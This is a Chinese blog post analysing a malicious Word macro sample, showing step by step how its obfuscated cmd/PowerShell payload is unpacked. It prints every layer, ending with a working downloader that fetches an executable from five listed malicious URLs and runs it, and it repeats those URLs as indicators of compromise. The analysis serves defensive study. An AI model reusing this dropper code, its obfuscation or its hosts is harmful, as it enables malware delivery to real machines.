记一次Powershell反混淆 (1)
2024-05-10 18:19:17
样本地址:
https://www.virustotal.com/#/file/6f9034646e6fcead5342f708031412e3c2efdb4fb0f37bba43133a471d1cb0e0/detection
样本为一个Word文件,嵌入Macros,寻找命令执行点比较简单, 稍微跟了一下直接定位到
Sub SssbuNrRrEn(UJXYrqZETb As String)
On Error Resume Next
MfiCpKuAf = RfiiUVAYh - kDjdViQqEL / (6835936 + zKwnqPGLEi - 6704003 + IpdbUjtvvCVI)
zEjLuEwUi = iXmhfkRVQGVwV - AoVXSoivpnn / (7268093 + vRAhOCQHGpnB - 1804077 + ZlPnAjBKFiZ)
Shell UJXYrqZETb, 0
CqNniwttB = DPYGvFXuwi - IKEJaznChl / (2341580 + IMMCUXrtI - 1601950 + WVqhEidP)
HADtjJdIw = qTkrzQuj - DXHoNAC / (6577259 + jSiYDVFRESftq - 2966087 + mRoXiXZmUbasz)
End Sub明显可以看到UJXYrqZETb比较关键,len(UJXYrqZETb) = 3263,不能直接通过Debug - Add watch获取, 可以将UJXYrqZETb写入文件从而获取完整的UJXYrqZETb值。
Sub SssbuNrRrEn(UJXYrqZETb As String)
On Error Resume Next
MfiCpKuAf = RfiiUVAYh - kDjdViQqEL / (6835936 + zKwnqPGLEi - 6704003 + IpdbUjtvvCVI)
zEjLuEwUi = iXmhfkRVQGVwV - AoVXSoivpnn / (7268093 + vRAhOCQHGpnB - 1804077 + ZlPnAjBKFiZ)Set objFSO=CreateObject("Scripting.FileSystemObject")outFile="c:\windows\temp\output.txt"
Set objFile = objFSO.CreateTextFile(outFile,True)
objFile.Write "test string"
objFile.Close' Shell UJXYrqZETb, 0
CqNniwttB = DPYGvFXuwi - IKEJaznChl / (2341580 + IMMCUXrtI - 1601950 + WVqhEidP)
HADtjJdIw = qTkrzQuj - DXHoNAC / (6577259 + jSiYDVFRESftq - 2966087 + mRoXiXZmUbasz)
End Sub查看output.txt 获取cmd命令
cmd hhwjquui qwgeui qwgeiqweqwe iqw ohd ioqwhd ioqwhido & %C^om^S^p^Ec% /V /c set %VBiwAbXNZVRf%=p^o^w^er&&set %WVXlCPwVdc%=^sh^ell&&!%VBiwAbXNZVRf%!!%WVXlCPwVdc%! " & ( $VErBOSePReFErenCe.TOSTrIng()[1,3]+'X'-joIn'')( ((' '+'.( ([stRIN'+'g]j'+'3xVeRBoSepreFerence)[1,3]+cv5Xcv5-Joincv5cv5) ( ('+'cv'+'5.((gET-vcv5+cv5aRIAbLE S0P*MDr*S0P).NamE[3,11,2]-joiNS'+'0PS0P) ( (S'+'0P((iMP4YoiMP+iMPnsi'+'MP+iMP'+'aiMP+iMPdasd = &(Y4EnY4Ecv5+cv5+Y4EeY4E+Y4Ew-oiMP+iMPbjeiMP+iMS0P+S0PPcv5+cv5S0'+'P+S0PcY4Ei'+'MP+iMP+Y4EtYiMP+iMP4Ei'+'MP+iMPS0P+S0P) random;4YoiMP+cv'+'5+cv5iMPYYiMP+iMPUiMP+iMP =iMP+iMP .(Y4EniMP+iMPeY4E+iMP+iMPY4EwY4iMP+iMPE+Y4E-iMP+'+'iMPoS0P+S0PbjectYiMP+iMP4E)iMP+i'+'cv5+cv5MP SysiMP+'+'i'+'MPtemiMP+iMP.Net.iMP'+'+iMPWebCiMP+iMPlient;4YoNiMP+iMPSBiMcv5+cv5P+iMP =iMP+iMP 4iMP+iMPYonsadaiMP+iMPsd.nS0P+S0PextiMP+iMP(10000, 2iMP+iMP82133)i'+'MP+iS0P+S'+'0PMP;4YoAiMP+iMPDiMP+iMPCiMP+iMPX = iS0P+S0PMP+iMPY4EiMP+iMS0P+S0PP iMP+iMPhtiMP+iMPtp:/iMP+cv5+cv5'+'iMS0P+S0PP/iMP+iMPwww.elosduvale.iMP+iMPcomi'+'M'+'P+iMP.biMP+iMPr/OUFWS0P+S0P/?iS0P+S0PMP'+'cv5+cv5+iMPS0P+S0Phttp:iMP+iMP/iMP+cv5+cv5iMP/iMP+cv5+cv5iMPdiMP+iMPuicv5+cv5M'+'P+iMPlcv5+cv5faciMP'+'+iMPolltiMP+iMPdaiMP+iMP.iMP+iMP'+'ciMP+iMPom/rLiMP+iMP7zkpa/iMP+iS0P+S'+'0PMP?http://jiMP'+'+iMPati'+'.iMP+iMPciMP+iMP'+'oiMP+iMPmiMP+iMPS0P+S0'+'P.au/S0P+S0PkiMP+icv5+cv5MPRiMP+iMPBGS7S0P+S0cv5+cv5P/?iMP+'+'iMS0P+S0PPhttiMP+iMPps://ww'+'w.blueyachtchiMcv5+cv5P'+'+iMPartecv5+cv5r.com/cv5+cv5DiMP+iMPIjVX4UiM'+'P+iMP/?http://reiMP+iMPviewzaap.aiMP+cv5+cv5iMPzurewS0P+Scv5+cv50PiMP+iMPebsitesiMP+iMP.net/oMgoZ/Y4iMP+iMPE.iMP+iMPcv5+cv5Split(i'+'MP+iMPY4E?Y4E);4YiMP+iMPoSDCS0P+S0PiMP+iMP i'+'MP+iMP= 4Yicv5+cv5MP+iMPoiS0P+S0PMP+iMPeniMPS0P+S0P+iMPv:publiiMP+iMPc cv5+cv5+ iMcv5+cv5P+iMPY4iMP+iMPEicv5+cv5MP+iMPjPIY4E +iMP+iMS0P+S0PP 4Y'+'oN'+'iMPcv5+cv5+iMPSiMP+iMPB i'+'MP+iMP+ (Y4E.ecv5+cv5iMP+iMPxY4E+Y4EeYiMP+iMcv5+cv5P4E)iM'+'P+iMP;iMPcv5+cv5+iMcv5+cv5PfiMP'+'+iMPoreaiMP+iMPciMPcv5+cv5+iMPhiMP'+'cv5+cv5+iMP(4Y'+'oaiS0P+S0PMP+iMPsfc iniMP'+'+iMP 4YoADiMP+'+'iMPCXiMP+iMP){tiMP+iMPryiMP+iMP{4YoYYU'+'.W2KDovLdWiMP+iMPnlvLdiMP+iMPOadFIvLcv5+cv5dlicv5+cv5MS0P+S0PP+iMPS0P+cv5+cv5'+'S0PeiMP+i'+'MPWiMP+iMP2K('+'4Ycv5+cv5iMP+iMPoiMP+iM'+'PasfciMP+iMP.W'+'2iMP+iMPKiS0P+S0PMP'+'+iMPTiMS0P+S0PP+iMPoStrvLd'+'ivLdNg'+'W2K()iM'+'P+iMP, 4YoSDiMP+iMPC);&iMP+iMP(Y'+'4EiMP+iMPIncv5+'+'cv5voiMP+iMPY4S0P+S0PEiMP+iMP+Y4EkY4iMP+'+'iMPEiMP+iMS0P+S0PPcv5+cv5+Y4EiMP+iMPe-IiMc'+'v5+cv5P+iMPteiMP+S0P+S0PiMPmYiMP+iMP4E)(4YoSDC)iMP+iMP;break;iMP+iMP}catch{}}iMP) -rEpLace ([Char]89+[Char]'+'52+[Char]69),[CS0Pcv5+cv5'+'+S0P'+'har]39 -cRS0P+S0cv5+cv5PEPLACeiMPW2KiMP,[Char]34 -rEpLace i'+'MPjPIiMP,[Char]92 -ccv5+cv5REPLACe([Char]52+[Ccv5+cv5h'+'ar]89+[Char]111),[Char]3S0P+S0P6-cREPLACe(['+'C'+'har]118'+'+[Char]7'+'6+[ChS0P+'+'S0Par]100),[Char]96)vGA& ( IdQsheLLiD[1]+IdQs'+'hElLiD[13]+iMS0P+S0PPXiMP)S0P).rePLaCE(([ChAR]118+[ChAR]71'+'+[ChAR]65),S0P6wnS'+'0P).rePLaCE'+'(S0PIdQS0P,[sTriNG][cv5+cv5ChAR]36).recv5+cv5PLaCE(S0PiMPS0P,[sTriNG][ChAR]39) )cv5'+').rep'+'lAcE(([Char]83+[Char]48+['+'Ch'+'ar]80),[stRiNG][Char]39).replAcE(cv56wncv5,cv5X2'+'zcv5)) ') -CRePLace 'cv5',[cHAR]39 -ReplACE ([cHAR]88+[cHAR]50+[cHAR]122),[cHAR]124 -CRePLace 'j3x',[cHAR]36) )
然后像洋葱一样一层一层剥开你的心:
ieX( ((' '+'.( ([stRIN'+'g]j'+'3xVeRBoSepreFerence)[1,3]+cv5Xcv5-Joincv5cv5) ( ('+'cv'+'5.((gET-vcv5+cv5aRIAbLE S0P*MDr*S0P).NamE[3,11,2]-joiNS'+'0PS0P) ( (S'+'0P((iMP4YoiMP+iMPnsi'+'MP+iMP'+'aiMP+iMPdasd = &(Y4EnY4Ecv5+cv5+Y4EeY4E+Y4Ew-oiMP+iMPbjeiMP+iMS0P+S0PPcv5+cv5S0'+'P+S0PcY4Ei'+'MP+iMP+Y4EtYiMP+iMP4Ei'+'MP+iMPS0P+S0P) random;4YoiMP+cv'+'5+cv5iMPYYiMP+iMPUiMP+iMP =iMP+iMP .(Y4EniMP+iMPeY4E+iMP+iMPY4EwY4iMP+iMPE+Y4E-iMP+'+'iMPoS0P+S0PbjectYiMP+iMP4E)iMP+i'+'cv5+cv5MP SysiMP+'+'i'+'MPtemiMP+iMP.Net.iMP'+'+iMPWebCiMP+iMPlient;4YoNiMP+iMPSBiMcv5+cv5P+iMP =iMP+iMP 4iMP+iMPYonsadaiMP+iMPsd.nS0P+S0PextiMP+iMP(10000, 2iMP+iMP82133)i'+'MP+iS0P+S'+'0PMP;4YoAiMP+iMPDiMP+iMPCiMP+iMPX = iS0P+S0PMP+iMPY4EiMP+iMS0P+S0PP iMP+iMPhtiMP+iMPtp:/iMP+cv5+cv5'+'iMS0P+S0PP/iMP+iMPwww.elosduvale.iMP+iMPcomi'+'M'+'P+iMP.biMP+iMPr/OUFWS0P+S0P/?iS0P+S0PMP'+'cv5+cv5+iMPS0P+S0Phttp:iMP+iMP/iMP+cv5+cv5iMP/iMP+cv5+cv5iMPdiMP+iMPuicv5+cv5M'+'P+iMPlcv5+cv5faciMP'+'+iMPolltiMP+iMPdaiMP+iMP.iMP+iMP'+'ciMP+iMPom/rLiMP+iMP7zkpa/iMP+iS0P+S'+'0PMP?http://jiMP'+'+iMPati'+'.iMP+iMPciMP+iMP'+'oiMP+iMPmiMP+iMPS0P+S0'+'P.au/S0P+S0PkiMP+icv5+cv5MPRiMP+iMPBGS7S0P+S0cv5+cv5P/?iMP+'+'iMS0P+S0PPhttiMP+iMPps://ww'+'w.blueyachtchiMcv5+cv5P'+'+iMPartecv5+cv5r.com/cv5+cv5DiMP+iMPIjVX4UiM'+'P+iMP/?http://reiMP+iMPviewzaap.aiMP+cv5+cv5iMPzurewS0P+Scv5+cv50PiMP+iMPebsitesiMP+iMP.net/oMgoZ/Y4iMP+iMPE.iMP+iMPcv5+cv5Split(i'+'MP+iMPY4E?Y4E);4YiMP+iMPoSDCS0P+S0PiMP+iMP i'+'MP+iMP= 4Yicv5+cv5MP+iMPoiS0P+S0PMP+iMPeniMPS0P+S0P+iMPv:publiiMP+iMPc cv5+cv5+ iMcv5+cv5P+iMPY4iMP+iMPEicv5+cv5MP+iMPjPIY4E +iMP+iMS0P+S0PP 4Y'+'oN'+'iMPcv5+cv5+iMPSiMP+iMPB i'+'MP+iMP+ (Y4E.ecv5+cv5iMP+iMPxY4E+Y4EeYiMP+iMcv5+cv5P4E)iM'+'P+iMP;iMPcv5+cv5+iMcv5+cv5PfiMP'+'+iMPoreaiMP+iMPciMPcv5+cv5+iMPhiMP'+'cv5+cv5+iMP(4Y'+'oaiS0P+S0PMP+iMPsfc iniMP'+'+iMP 4YoADiMP+'+'iMPCXiMP+iMP){tiMP+iMPryiMP+iMP{4YoYYU'+'.W2KDovLdWiMP+iMPnlvLdiMP+iMPOadFIvLcv5+cv5dlicv5+cv5MS0P+S0PP+iMPS0P+cv5+cv5'+'S0PeiMP+i'+'MPWiMP+iMP2K('+'4Ycv5+cv5iMP+iMPoiMP+iM'+'PasfciMP+iMP.W'+'2iMP+iMPKiS0P+S0PMP'+'+iMPTiMS0P+S0PP+iMPoStrvLd'+'ivLdNg'+'W2K()iM'+'P+iMP, 4YoSDiMP+iMPC);&iMP+iMP(Y'+'4EiMP+iMPIncv5+'+'cv5voiMP+iMPY4S0P+S0PEiMP+iMP+Y4EkY4iMP+'+'iMPEiMP+iMS0P+S0PPcv5+cv5+Y4EiMP+iMPe-IiMc'+'v5+cv5P+iMPteiMP+S0P+S0PiMPmYiMP+iMP4E)(4YoSDC)iMP+iMP;break;iMP+iMP}catch{}}iMP) -rEpLace ([Char]89+[Char]'+'52+[Char]69),[CS0Pcv5+cv5'+'+S0P'+'har]39 -cRS0P+S0cv5+cv5PEPLACeiMPW2KiMP,[Char]34 -rEpLace i'+'MPjPIiMP,[Char]92 -ccv5+cv5REPLACe([Char]52+[Ccv5+cv5h'+'ar]89+[Char]111),[Char]3S0P+S0P6-cREPLACe(['+'C'+'har]118'+'+[Char]7'+'6+[ChS0P+'+'S0Par]100),[Char]96)vGA& ( IdQsheLLiD[1]+IdQs'+'hElLiD[13]+iMS0P+S0PPXiMP)S0P).rePLaCE(([ChAR]118+[ChAR]71'+'+[ChAR]65),S0P6wnS'+'0P).rePLaCE'+'(S0PIdQS0P,[sTriNG][cv5+cv5ChAR]36).recv5+cv5PLaCE(S0PiMPS0P,[sTriNG][ChAR]39) )cv5'+').rep'+'lAcE(([Char]83+[Char]48+['+'Ch'+'ar]80),[stRiNG][Char]39).replAcE(cv56wncv5,cv5X2'+'zcv5)) ') -CRePLace 'cv5',[cHAR]39 -ReplACE ([cHAR]88+[cHAR]50+[cHAR]122),[cHAR]124 -CRePLace 'j3x',[cHAR]36) )
ieX( .( ([stRINg]$VeRBoSepreFerence)[1,3]+'X'-Join'') ( ('.((gET-v'+'aRIAbLE S0P*MDr*S0P).NamE[3,11,2]-joiNS0PS0P) ( (S0P((
iMP4YoiMP+iMPnsiMP+iMPaiMP+iMPdasd = &(Y4EnY4E'+'+Y4EeY4E+Y4Ew-oiMP+iMPbjeiMP+iMS0P+S0PP'+'S0P+S0PcY4EiMP+iMP+Y4EtYiMP+
iMP4EiMP+iMPS0P+S0P) random;4YoiMP+'+'iMPYYiMP+iMPUiMP+iMP =iMP+iMP .(Y4EniMP+iMPeY4E+iMP+iMPY4EwY4iMP+iMPE+Y4E-iMP+iMP
oS0P+S0PbjectYiMP+iMP4E)iMP+i'+'MP SysiMP+iMPtemiMP+iMP.Net.iMP+iMPWebCiMP+iMPlient;4YoNiMP+iMPSBiM'+'P+iMP =iMP+iMP 4i
MP+iMPYonsadaiMP+iMPsd.nS0P+S0PextiMP+iMP(10000, 2iMP+iMP82133)iMP+iS0P+S0PMP;4YoAiMP+iMPDiMP+iMPCiMP+iMPX = iS0P+S0PMP
+iMPY4EiMP+iMS0P+S0PP iMP+iMPhtiMP+iMPtp:/iMP+'+'iMS0P+S0PP/iMP+iMPwww.elosduvale.iMP+iMPcomiMP+iMP.biMP+iMPr/OUFWS0P+S
0P/?iS0P+S0PMP'+'+iMPS0P+S0Phttp:iMP+iMP/iMP+'+'iMP/iMP+'+'iMPdiMP+iMPui'+'MP+iMPl'+'faciMP+iMPolltiMP+iMPdaiMP+iMP.iMP
+iMPciMP+iMPom/rLiMP+iMP7zkpa/iMP+iS0P+S0PMP?http://jiMP+iMPati.iMP+iMPciMP+iMPoiMP+iMPmiMP+iMPS0P+S0P.au/S0P+S0PkiMP+i
'+'MPRiMP+iMPBGS7S0P+S0'+'P/?iMP+iMS0P+S0PPhttiMP+iMPps://www.blueyachtchiM'+'P+iMParte'+'r.com/'+'DiMP+iMPIjVX4UiMP+iM
P/?http://reiMP+iMPviewzaap.aiMP+'+'iMPzurewS0P+S'+'0PiMP+iMPebsitesiMP+iMP.net/oMgoZ/Y4iMP+iMPE.iMP+iMP'+'Split(iMP+iM
PY4E?Y4E);4YiMP+iMPoSDCS0P+S0PiMP+iMP iMP+iMP= 4Yi'+'MP+iMPoiS0P+S0PMP+iMPeniMPS0P+S0P+iMPv:publiiMP+iMPc '+'+ iM'+'P+i
MPY4iMP+iMPEi'+'MP+iMPjPIY4E +iMP+iMS0P+S0PP 4YoNiMP'+'+iMPSiMP+iMPB iMP+iMP+ (Y4E.e'+'iMP+iMPxY4E+Y4EeYiMP+iM'+'P4E)iM
P+iMP;iMP'+'+iM'+'PfiMP+iMPoreaiMP+iMPciMP'+'+iMPhiMP'+'+iMP(4YoaiS0P+S0PMP+iMPsfc iniMP+iMP 4YoADiMP+iMPCXiMP+iMP){tiM
P+iMPryiMP+iMP{4YoYYU.W2KDovLdWiMP+iMPnlvLdiMP+iMPOadFIvL'+'dli'+'MS0P+S0PP+iMPS0P+'+'S0PeiMP+iMPWiMP+iMP2K(4Y'+'iMP+iM
PoiMP+iMPasfciMP+iMP.W2iMP+iMPKiS0P+S0PMP+iMPTiMS0P+S0PP+iMPoStrvLdivLdNgW2K()iMP+iMP, 4YoSDiMP+iMPC);&iMP+iMP(Y4EiMP+i
MPIn'+'voiMP+iMPY4S0P+S0PEiMP+iMP+Y4EkY4iMP+iMPEiMP+iMS0P+S0PP'+'+Y4EiMP+iMPe-IiM'+'P+iMPteiMP+S0P+S0PiMPmYiMP+iMP4E)(4
YoSDC)iMP+iMP;break;iMP+iMP}catch{}}iMP) -rEpLace ([Char]89+[Char]52+[Char]69),[CS0P'+'+S0Phar]39 -cRS0P+S0'+'PEPLACei
MPW2KiMP,[Char]34 -rEpLace iMPjPIiMP,[Char]92 -c'+'REPLACe([Char]52+[C'+'har]89+[Char]111),[Char]3S0P+S0P6-cREPLACe([
Char]118+[Char]76+[ChS0P+S0Par]100),[Char]96)vGA& ( IdQsheLLiD[1]+IdQshElLiD[13]+iMS0P+S0PPXiMP)S0P).rePLaCE(([ChAR]118
+[ChAR]71+[ChAR]65),S0P6wnS0P).rePLaCE(S0PIdQS0P,[sTriNG]['+'ChAR]36).re'+'PLaCE(S0PiMPS0P,[sTriNG][ChAR]39) )').replAc
E(([Char]83+[Char]48+[Char]80),[stRiNG][Char]39).replAcE('6wn','|')) )
ieX( .ieX ( ('.((gET-v'+'aRIAbLE S0P*MDr*S0P).NamE[3,11,2]-joiNS0PS0P) ( (S0P((iMP4YoiMP+iMPnsiMP+iMPaiMP+iMPdasd = &(Y4EnY4E'+'+Y4EeY4E+Y4Ew-oiMP+iMPbjeiMP+iMS0P+S0PP'+'S0P+S0PcY4EiMP+iMP+Y4EtYiMP+iMP4EiMP+iMPS0P+S0P) random;4YoiMP+'+'iMPYYiMP+iMPUiMP+iMP =iMP+iMP .(Y4EniMP+iMPeY4E+iMP+iMPY4EwY4iMP+iMPE+Y4E-iMP+iMPoS0P+S0PbjectYiMP+iMP4E)iMP+i'+'MP SysiMP+iMPtemiMP+iMP.Net.iMP+iMPWebCiMP+iMPlient;4YoNiMP+iMPSBiM'+'P+iMP =iMP+iMP 4iMP+iMPYonsadaiMP+iMPsd.nS0P+S0PextiMP+iMP(10000, 2iMP+iMP82133)iMP+iS0P+S0PMP;4YoAiMP+iMPDiMP+iMPCiMP+iMPX = iS0P+S0PMP+iMPY4EiMP+iMS0P+S0PP iMP+iMPhtiMP+iMPtp:/iMP+'+'iMS0P+S0PP/iMP+iMPwww.elosduvale.iMP+iMPcomiMP+iMP.biMP+iMPr/OUFWS0P+S0P/?iS0P+S0PMP'+'+iMPS0P+S0Phttp:iMP+iMP/iMP+'+'iMP/iMP+'+'iMPdiMP+iMPui'+'MP+iMPl'+'faciMP+iMPolltiMP+iMPdaiMP+iMP.iMP+iMPciMP+iMPom/rLiMP+iMP7zkpa/iMP+iS0P+S0PMP?http://jiMP+iMPati.iMP+iMPciMP+iMPoiMP+iMPmiMP+iMPS0P+S0P.au/S0P+S0PkiMP+i'+'MPRiMP+iMPBGS7S0P+S0'+'P/?iMP+iMS0P+S0PPhttiMP+iMPps://www.blueyachtchiM'+'P+iMParte'+'r.com/'+'DiMP+iMPIjVX4UiMP+iMP/?http://reiMP+iMPviewzaap.aiMP+'+'iMPzurewS0P+S'+'0PiMP+iMPebsitesiMP+iMP.net/oMgoZ/Y4iMP+iMPE.iMP+iMP'+'Split(iMP+iMPY4E?Y4E);4YiMP+iMPoSDCS0P+S0PiMP+iMP iMP+iMP= 4Yi'+'MP+iMPoiS0P+S0PMP+iMPeniMPS0P+S0P+iMPv:publiiMP+iMPc '+'+ iM'+'P+iMPY4iMP+iMPEi'+'MP+iMPjPIY4E +iMP+iMS0P+S0PP 4YoNiMP'+'+iMPSiMP+iMPB iMP+iMP+ (Y4E.e'+'iMP+iMPxY4E+Y4EeYiMP+iM'+'P4E)iMP+iMP;iMP'+'+iM'+'PfiMP+iMPoreaiMP+iMPciMP'+'+iMPhiMP'+'+iMP(4YoaiS0P+S0PMP+iMPsfc iniMP+iMP 4YoADiMP+iMPCXiMP+iMP){tiMP+iMPryiMP+iMP{4YoYYU.W2KDovLdWiMP+iMPnlvLdiMP+iMPOadFIvL'+'dli'+'MS0P+S0PP+iMPS0P+'+'S0PeiMP+iMPWiMP+iMP2K(4Y'+'iMP+iMPoiMP+iMPasfciMP+iMP.W2iMP+iMPKiS0P+S0PMP+iMPTiMS0P+S0PP+iMPoStrvLdivLdNgW2K()iMP+iMP, 4YoSDiMP+iMPC);&iMP+iMP(Y4EiMP+iMPIn'+'voiMP+iMPY4S0P+S0PEiMP+iMP+Y4EkY4iMP+iMPEiMP+iMS0P+S0PP'+'+Y4EiMP+iMPe-IiM'+'P+iMPteiMP+S0P+S0PiMPmYiMP+iMP4E)(4YoSDC)iMP+iMP;break;iMP+iMP}catch{}}iMP) -rEpLace ([Char]89+[Char]52+[Char]69),[CS0P'+'+S0Phar]39 -cRS0P+S0'+'PEPLACeiMPW2KiMP,[Char]34 -rEpLace iMPjPIiMP,[Char]92 -c'+'REPLACe([Char]52+[C'+'har]89+[Char]111),[Char]3S0P+S0P6-cREPLACe([Char]118+[Char]76+[ChS0P+S0Par]100),[Char]96)vGA& ( IdQsheLLiD[1]+IdQshElLiD[13]+iMS0P+S0PPXiMP)S0P).rePLaCE(([ChAR]118+[ChAR]71+[ChAR]65),S0P6wnS0P).rePLaCE(S0PIdQS0P,[sTriNG]['+'ChAR]36).re'+'PLaCE(S0PiMPS0P,[sTriNG][ChAR]39) )').replAcE(([Char]83+[Char]48+[Char]80),[stRiNG][Char]39).replAcE('6wn','|')) )
ieX( .ieX .((gET-vaRIAbLE '*MDr*').NamE[3,11,2]-joiN'') ( ('((iMP4YoiMP+iMPnsiMP+iMPaiMP+iMPdasd = &(Y4EnY4E+Y4EeY4E+Y4Ew-oiMP+iM
PbjeiMP+iM'+'P'+'cY4EiMP+iMP+Y4EtYiMP+iMP4EiMP+iMP'+') random;4YoiMP+iMPYYiMP+iMPUiMP+iMP =iMP+iMP .(Y4EniMP+iMPeY4E+iM
P+iMPY4EwY4iMP+iMPE+Y4E-iMP+iMPo'+'bjectYiMP+iMP4E)iMP+iMP SysiMP+iMPtemiMP+iMP.Net.iMP+iMPWebCiMP+iMPlient;4YoNiMP+iMP
SBiMP+iMP =iMP+iMP 4iMP+iMPYonsadaiMP+iMPsd.n'+'extiMP+iMP(10000, 2iMP+iMP82133)iMP+i'+'MP;4YoAiMP+iMPDiMP+iMPCiMP+iMPX= i'+'MP+iMPY4EiMP+iM'+'P iMP+iMPhtiMP+iMPtp:/iMP+iM'+'P/iMP+iMPwww.elosduvale.iMP+iMPcomiMP+iMP.biMP+iMPr/OUFW'+'/?i'
+'MP+iMP'+'http:iMP+iMP/iMP+iMP/iMP+iMPdiMP+iMPuiMP+iMPlfaciMP+iMPolltiMP+iMPdaiMP+iMP.iMP+iMPciMP+iMPom/rLiMP+iMP7zkpa
/iMP+i'+'MP?http://jiMP+iMPati.iMP+iMPciMP+iMPoiMP+iMPmiMP+iMP'+'.au/'+'kiMP+iMPRiMP+iMPBGS7'+'/?iMP+iM'+'PhttiMP+iMPps
://www.blueyachtchiMP+iMParter.com/DiMP+iMPIjVX4UiMP+iMP/?http://reiMP+iMPviewzaap.aiMP+iMPzurew'+'iMP+iMPebsitesiMP+iM
P.net/oMgoZ/Y4iMP+iMPE.iMP+iMPSplit(iMP+iMPY4E?Y4E);4YiMP+iMPoSDC'+'iMP+iMP iMP+iMP= 4YiMP+iMPoi'+'MP+iMPeniMP'+'+iMPv:
publiiMP+iMPc + iMP+iMPY4iMP+iMPEiMP+iMPjPIY4E +iMP+iM'+'P 4YoNiMP+iMPSiMP+iMPB iMP+iMP+ (Y4E.eiMP+iMPxY4E+Y4EeYiMP+iMP
4E)iMP+iMP;iMP+iMPfiMP+iMPoreaiMP+iMPciMP+iMPhiMP+iMP(4Yoai'+'MP+iMPsfc iniMP+iMP 4YoADiMP+iMPCXiMP+iMP){tiMP+iMPryiMP+
iMP{4YoYYU.W2KDovLdWiMP+iMPnlvLdiMP+iMPOadFIvLdliM'+'P+iMP'+'eiMP+iMPWiMP+iMP2K(4YiMP+iMPoiMP+iMPasfciMP+iMP.W2iMP+iMPK
i'+'MP+iMPTiM'+'P+iMPoStrvLdivLdNgW2K()iMP+iMP, 4YoSDiMP+iMPC);&iMP+iMP(Y4EiMP+iMPInvoiMP+iMPY4'+'EiMP+iMP+Y4EkY4iMP+iM
PEiMP+iM'+'P+Y4EiMP+iMPe-IiMP+iMPteiMP+'+'iMPmYiMP+iMP4E)(4YoSDC)iMP+iMP;break;iMP+iMP}catch{}}iMP) -rEpLace ([Char]89
+[Char]52+[Char]69),[C'+'har]39 -cR'+'EPLACeiMPW2KiMP,[Char]34 -rEpLace iMPjPIiMP,[Char]92 -cREPLACe([Char]52+[Char]8
9+[Char]111),[Char]3'+'6-cREPLACe([Char]118+[Char]76+[Ch'+'ar]100),[Char]96)vGA& ( IdQsheLLiD[1]+IdQshElLiD[13]+iM'+'PX
iMP)').rePLaCE(([ChAR]118+[ChAR]71+[ChAR]65),'|').rePLaCE('IdQ',[sTriNG][ChAR]36).rePLaCE('iMP',[sTriNG][ChAR]39) ) )
ieX( .ieX .ieX (('4Yo'+'ns'+'a'+'dasd = &(Y4EnY4E+Y4EeY4E+Y4Ew-o'+'bje'+'cY4E'+'+Y4EtY'+'4E'+') random;4Yo'+'YY'+'U'+' ='+' .(Y4En'+'e
Y4E+'+'Y4EwY4'+'E+Y4E-'+'objectY'+'4E)'+' Sys'+'tem'+'.Net.'+'WebC'+'lient;4YoN'+'SB'+' ='+' 4'+'Yonsada'+'sd.next'+'(1
0000, 2'+'82133)'+';4YoA'+'D'+'C'+'X = '+'Y4E'+' '+'ht'+'tp:/'+'/'+'www.elosduvale.'+'com'+'.b'+'r/OUFW/?'+'http:'+'/'+
'/'+'d'+'u'+'lfac'+'ollt'+'da'+'.'+'c'+'om/rL'+'7zkpa/'+'?http://j'+'ati.'+'c'+'o'+'m'+'.au/k'+'R'+'BGS7/?'+'htt'+'ps:/
/www.blueyachtch'+'arter.com/D'+'IjVX4U'+'/?http://re'+'viewzaap.a'+'zurew'+'ebsites'+'.net/oMgoZ/Y4'+'E.'+'Split('+'Y4
E?Y4E);4Y'+'oSDC'+' '+'= 4Y'+'o'+'en'+'v:publi'+'c + '+'Y4'+'E'+'jPIY4E +'+' 4YoN'+'S'+'B '+'+ (Y4E.e'+'xY4E+Y4EeY'+'4E
)'+';'+'f'+'orea'+'c'+'h'+'(4Yoa'+'sfc in'+' 4YoAD'+'CX'+'){t'+'ry'+'{4YoYYU.W2KDovLdW'+'nlvLd'+'OadFIvLdl'+'e'+'W'+'2K
(4Y'+'o'+'asfc'+'.W2'+'K'+'T'+'oStrvLdivLdNgW2K()'+', 4YoSD'+'C);&'+'(Y4E'+'Invo'+'Y4E'+'+Y4EkY4'+'E'+'+Y4E'+'e-I'+'te'
+'mY'+'4E)(4YoSDC)'+';break;'+'}catch{}}') -rEpLace ([Char]89+[Char]52+[Char]69),[Char]39 -cREPLACe'W2K',[Char]34 -rEp
Lace 'jPI',[Char]92 -cREPLACe([Char]52+[Char]89+[Char]111),[Char]36-cREPLACe([Char]118+[Char]76+[Char]100),[Char]96)|
& ( $sheLLiD[1]+$shElLiD[13]+'X') )
ieX( .ieX .ieX ($nsadasd = &('n'+'e'+'w-objec'+'t') random;$YYU = .('ne'+'w'+'-object') System.Net.WebClient;$NSB = $nsadasd.next(10000
, 282133);$ADCX = ' http://www.elosduvale.com.br/OUFW/?http://dulfacolltda.com/rL7zkpa/?http://jati.com.au/kRBGS7/?http
s://www.blueyachtcharter.com/DIjVX4U/?http://reviewzaap.azurewebsites.net/oMgoZ/'.Split('?');$SDC = $env:public + '\' +$NSB + ('.ex'+'e');foreach($asfc in $ADCX){try{$YYU."Do`Wnl`OadFI`le"($asfc."ToStr`i`Ng"(), $SDC);&('Invo'+'k'+'e-Item
')($SDC);break;}catch{}} |& ( $sheLLiD[1]+$shElLiD[13]+'X') )
Network IoCs:
http://www.elosduvale.com.br/OUFW/
http://dulfacolltda.com/rL7zkpa/
http://jati.com.au/kRBGS7/
https://www.blueyachtcharter.com/DIjVX4U/
http://reviewzaap.azurewebsites.net/oMgoZ/
转载于:https://www.cnblogs.com/xiaoxiaoleo/p/8578567.html
记一次Powershell反混淆 (1)相关推荐
- c/c++反混淆方法
deobfuscation 记需要反混淆的函数为output=obf-function(input). 反混淆的思路,首先标记输入的变量记为input-symbol,通过Taint跟踪改变量的流向,并 ...
- 导出txt文件宏_XLM宏反混淆工具:提取和反混淆XLM宏
XLM宏反混淆器 XLMMacroDeobfuscator可用于解码模糊的XLM宏(也称为Excel 4.0宏).它利用内部XLM仿真器来解释宏,而无需完全执行代码. 它同时支持xls,xlsm和xl ...
- 技术分享:几种常见的JavaScript混淆和反混淆工具分析实战【转】
信息安全常被描述成一场军备竞赛,白帽与黑帽,渗透测试者与黑客,善与恶,本文将聚焦这场永无止境决斗中的一个小点. HTML5 & JS 应用中充满着对输入进行验证/注入的问题,需要开发人员始终保 ...
- c#反混淆工具de4dot 一般混淆都可以解决
c#反混淆工具de4dot 一般混淆都可以解决 使用方法: 1.CMD 打开 De4Dot 所在文件夹 最好是以管理员身份运行CMD 2.输入 De4Dot C:\Users\muzigaiyu\D ...
